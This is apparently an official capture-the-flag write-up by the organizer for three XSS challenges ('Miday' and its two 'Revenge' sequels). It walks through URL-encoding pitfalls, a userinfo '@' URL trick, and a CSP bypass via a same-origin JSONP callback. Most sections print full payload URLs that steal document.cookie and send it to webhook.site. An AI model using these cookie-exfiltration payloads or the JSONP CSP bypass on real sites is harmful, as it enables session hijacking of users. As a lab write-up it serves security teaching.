cybersecurity

NHNC CTF Official Write Up for Miday

Yoni Yang

3 min read

Table Of Contents

  • Miday
  • Miday Revenge
  • Miday Revenge Revenge
  • Some final thoughts

Miday

Simple XSS

should be simple (?)

What made this challenge a little bit difficult is:

Encoding

+ -> " " (space)
Common Wrong Payload:

http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=a%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/`+document.cookie)%3C/script%3E
Also see:https://www.w3schools.com/tags/ref_urlencode.ASP

Result

Pasted image

Intended Solution

http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/${document.cookie}`)%3C/script%3E
Uses String Interpolation
image

Miday Revenge

the little @

What might be wrong?

Common Wrong Payload

http://docs.google.com@http://miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E

Results.....

image

Intended Solution

http://docs.google.com@miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E
image

Miday Revenge Revenge

That Google CSP is a scam, I mean.

CSP Policies?

image

OK, I see.

image
<meta http-equiv="Content-Security-Policy" content="script-src 'self' https://www.google.com; img-src 'self' ; default-src 'self'">
image
image
https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//

No.

fetch is blocked

image
"><script src=https://www.google.com/complete/search?client=chrome&q=123&jsonp=fetch(`webhook.site/aa/${document.cookie}`)// ></script>

Bypass Google.com JSONP filter?

Maybe, Me noob so I can't.

Wait

image

XSS via JSONP ?

YES

"><script src=/api/v1/getnews?callback=top.location=`meow`//></script>">
image

So Intended Solution was...

http://miday_revenge_revenge.nicewhite.eu.org:60006/search?search=a%22%3E%3Cscript%20src=/api/v1/getnews?callback=top.location=`https://webhook.site/5155f756-cc73-4d6b-b1b1-70c4a8f372aa/${document.cookie}`//%3E%3C/script%3E%22%3E

Works

image
Google CSP is a scam XD

My Final Thoughts

Hello, thanks for reading.
I hope all of you had fun && learned something during the event.
Those challenge ideas came from the cool things I've learned during I research Cyber Security.
(And I dont expect that 'miday' was that hard XD)

We fixed a lot of unintended solutions, got DOSED during mid time (miday was hosted on my homelab, and it got knockout down 🫠)

bash fork: retry: Resource temporarily unavailable

And our main machine got OOE (Out Of memory) during competition, we have to contact out hoster to reboot it, and immediately setting RAM/CPU limit on those docker containers.

Anyways, it was fun!

HackMD:
Miday - HackMD
Miday
HackMD